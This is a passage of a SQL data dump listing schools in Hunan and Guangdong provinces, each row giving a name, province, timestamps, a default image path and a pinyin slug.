17:40:37','/images/school/default.png','hunanjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1643,'湖南商务职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanshangwuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1644,'湖南体育职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunantiyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1645,'湖南工程职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunangongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1646,'保险职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','baoxianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1647,'湖南网络工程职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanwangluogongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1648,'邵阳职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shaoyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1649,'湖南司法警官职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunansifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1650,'长沙商贸旅游职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshashangmaolvyouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1651,'湘潭职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xiangtanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1652,'郴州职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','chenzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1653,'娄底职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','loudizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1654,'张家界航空工业职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhangjiajiehangkonggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1655,'长沙环境保护职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshahuanjingbaohuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1656,'湖南艺术职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1657,'湖南机电职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1658,'长沙职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1659,'怀化职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huaihuazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1660,'岳阳职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','yueyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1661,'常德职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changdezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1662,'长沙南方职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshananfangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1663,'潇湘职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xiaoxiangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1664,'湖南化工职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanhuagongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1665,'湖南城建职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanchengjianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1666,'湖南石油化工职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanshiyouhuagongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1667,'湖南民族职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanminzuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1668,'湘西民族职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xiangximinzuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1669,'衡阳财经工业职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hengyangcaijinggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1670,'益阳职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','yiyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1671,'湖南同德职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunantongdezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1672,'湖南信息学院','湖南省','2014-04-23 00:00:00','2018-05-24 18:22:22','/images/school/default.png','hunanxinxikexuezhiyexueyuan',0,NULL,NULL,1,NULL,'2018-05-24 18:22:22'),(1673,'湖南工艺美术职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunangongyimeishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1674,'湖南九嶷职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanjiuyizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1675,'湖南理工职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanligongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1676,'湖南科技经贸职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunankejijingmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1677,'湖南软件职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanruanjianzhiyexueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1678,'株洲职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhuzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1679,'长沙电力职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changshadianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1680,'湖南水利水电职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanshuilishuidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1681,'湖南现代物流职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunanxiandaiwuliuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1682,'湖南铁路科技职业技术学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunantielukejizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1683,'湖南安全技术职业学院','湖南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hunananquanjishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1684,'中山大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhongshandaxue',0,NULL,NULL,0,NULL,NULL),(1685,'华南理工大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huananligongdaxue',0,NULL,NULL,0,NULL,NULL),(1686,'暨南大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jinandaxue',0,NULL,NULL,0,NULL,NULL),(1687,'汕头大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shantoudaxue',0,NULL,NULL,0,NULL,NULL),(1688,'华南农业大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huanannongyedaxue',0,NULL,NULL,0,NULL,NULL),(1689,'广东海洋大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdonghaiyangdaxue',0,NULL,NULL,0,NULL,NULL),(1690,'广州医科大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangzhouyikedaxue',0,NULL,NULL,0,NULL,NULL),(1691,'广州中医药大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangzhouzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(1692,'华南师范大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huananshifandaxue',0,NULL,NULL,0,NULL,NULL),(1693,'深圳大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shenzhendaxue',0,NULL,NULL,0,NULL,NULL),(1694,'广州大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangzhoudaxue',0,NULL,NULL,0,NULL,NULL),(1695,'五邑大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','wuyidaxue',0,NULL,NULL,0,NULL,NULL),(1696,'广东工业大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdonggongyedaxue',0,NULL,NULL,0,NULL,NULL),(1697,'广东外语外贸大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongwaiyuwaimaodaxue',0,NULL,NULL,0,NULL,NULL),(1698,'南方科技大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','nanfangkejidaxue',0,NULL,NULL,0,NULL,NULL),(1699,'北京师范大学-香港浸会大学\n联合国际学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','beijingshifandaxuexianggangjinhuidaxuelianheguojixueyuan',0,NULL,NULL,0,NULL,NULL),(1700,'南方医科大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','nanfangyikedaxue',0,NULL,NULL,0,NULL,NULL),(1701,'广东财经大学','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongcaijingdaxue',0,NULL,NULL,0,NULL,NULL),(1702,'广东医学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongyixueyuan',0,NULL,NULL,0,NULL,NULL),(1703,'广东药学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongyaoxueyuan',0,NULL,NULL,0,NULL,NULL),(1704,'韶关学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shaoguanxueyuan',0,NULL,NULL,0,NULL,NULL),(1705,'惠州学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huizhouxueyuan',0,NULL,NULL,0,NULL,NULL),(1706,'韩山师范学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hanshanshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1707,'湛江师范学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhanjiangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1708,'肇庆学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhaoqingxueyuan',0,NULL,NULL,0,NULL,NULL),(1709,'嘉应学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jiayingxueyuan',0,NULL,NULL,0,NULL,NULL),(1710,'广州体育学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangzhoutiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(1711,'广州美术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangzhoumeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1712,'星海音乐学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xinghaiyinlexueyuan',0,NULL,NULL,0,NULL,NULL),(1713,'广东技术师范学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongjishushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1714,'广东白云学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongbaiyunxueyuan',0,NULL,NULL,0,NULL,NULL),(1715,'广州航海学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangzhouhanghaixueyuan',0,NULL,NULL,0,NULL,NULL),(1716,'广东警官学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongjingguanxueyuan',0,NULL,NULL,0,NULL,NULL),(1717,'仲恺农业工程学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhongkainongyegongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(1718,'广东金融学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongjinrongxueyuan',0,NULL,NULL,0,NULL,NULL),(1719,'广东石油化工学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongshiyouhuagongxueyuan',0,NULL,NULL,0,NULL,NULL),(1720,'东莞理工学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','dongguanligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1721,'佛山科学技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','foshankexuejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1722,'广东培正学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongpeizhengxueyuan',0,NULL,NULL,0,NULL,NULL),(1723,'广东科技学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongkejixueyuan',0,NULL,NULL,0,NULL,NULL),(1724,'广东第二师范学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongdiershifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1725,'广东南华工商职业学院','广东省','2014-04-23 00:00:00','2017-09-04 17:32:07','/images/school/default.png','minbannanhuagongshangxueyuan',0,NULL,NULL,0,NULL,NULL),(1726,'私立华联学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','silihualianxueyuan',0,NULL,NULL,0,NULL,NULL),(1727,'肇庆医学高等专科学校','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhaoqingyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1728,'广州民航职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangzhouminhangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1729,'顺德职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shundezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1730,'广东轻工职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongqinggongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1731,'广东交通职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1732,'广东水利电力职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangdongshuilidianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1733,'潮汕职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','chaoshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1734,'深圳职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shenzhenzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1735,'广州番禺职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','guangzhoufanyuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1736,'南海东软信息技术职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','nanhaidongruanxinxijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1737,'广东科贸职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongkemaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1738,'广州科技贸易职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhoukejimaoyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1739,'中山职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1740,'广州珠江职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhouzhujiangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1741,'广州松田职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhousongtianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1742,'广东职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1743,'广东文理职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongwenlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1744,'广州城建职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhouchengjianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1745,'东莞职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','dongguanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1746,'广东南方职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongnanfangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1747,'广州华商职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhouhuashangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1748,'广州华夏职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhouhuaxiazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1749,'广东环境保护工程职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdonghuanjingbaohugongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1750,'广东青年职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongqingnianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1751,'广州东华职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhoudonghuazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1752,'广东创新科技职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongchuangxinkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1753,'广东舞蹈戏剧职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongwudaoxijuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1754,'惠州卫生职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','huizhouweishengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1755,'广东信息工程职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongxinxigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1756,'广东财经职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongcaijingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1757,'广东松山职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongsongshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1758,'广东农工商职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongnonggongshangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1759,'广东新安职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongxinanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1760,'佛山职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','foshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1761,'广东科学技术职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongkexuejishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1762,'广东食品药品职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongshipinyaopinzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1763,'广州康大职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhoukangdazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1764,'珠海艺术职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhuhaiyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1765,'广东行政职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongxingzhengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1766,'广东体育职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongtiyuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1767,'广东建设职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongjianshezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1768,'广东女子职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongnvzizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1769,'广东机电职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1770,'广东岭南职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdonglingnanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1771,'汕尾职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','shanweizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1772,'罗定职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','luodingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1773,'阳江职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yangjiangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1774,'河源职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','heyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1775,'广东邮电职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongyoudianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1776,'汕头职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','shantouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1777,'揭阳职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','jieyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1778,'深圳信息职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','shenzhenxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1779,'清远职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','qingyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1780,'广东工贸职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdonggongmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1781,'广东司法警官职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongsifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1782,'广东亚视演艺职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongyashiyanyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1783,'广东省外语艺术职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongshengwaiyuyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1784,'广东文艺职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongwenyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1785,'广州体育职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhoutiyuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1786,'广州工程技术职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhougongchengjishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1787,'中山火炬职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongshanhuojuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1788,'江门职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','jiangmenzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1789,'茂名职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','maomingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1790,'珠海城市职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhuhaichengshizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1791,'广州工商职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhougongshangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1792,'广州涉外经济职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhoushewaijingjizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1793,'广州南洋理工职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhounanyangligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1794,'广州科技职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhoukejizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1795,'惠州经济职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','huizhoujingjizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1796,'肇庆科技职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhaoqingkejizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1797,'肇庆工商职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhaoqinggongshangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1798,'广州现代信息工程职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhouxiandaixinxigongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1799,'广东理工职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdongligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1800,'广州华南商贸职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhouhuananshangmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1801,'广州华立科技职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhouhualikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1802,'广州城市职业学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangzhouchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1803,'广东工程职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangdonggongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1804,'广州铁路职业技术学院','广东省','2014-04-23 00:00:00','2015-10-16 